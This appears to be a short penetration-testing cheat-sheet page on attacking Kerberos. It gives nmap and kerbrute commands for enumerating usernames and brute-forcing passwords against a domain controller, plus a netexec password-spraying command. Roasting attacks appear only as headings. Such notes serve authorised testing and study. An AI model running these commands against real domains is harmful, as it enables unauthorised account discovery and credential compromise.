enumeration

Enumerate nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 "$target"

Brute force authentication # --dc: domain controller # -d: domain # combos.txt: the wordlist specified must be combinations with "username:password".

Þ kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt

# Users enumeration
Þ kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt

# Brute force user's password
Þ kerbrute bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username

Password spraying attack Þ netexec smb 10.10.11.236 -u users -p users --continue-on-success --no-brute

AES-REP Roasting We might be able to find password hashes of user accounts that does not require preauthentication. Please see AS-REP Roasting.

Kerberoasting attacks

Previouskerberos Nextldap

Last updated 1 day ago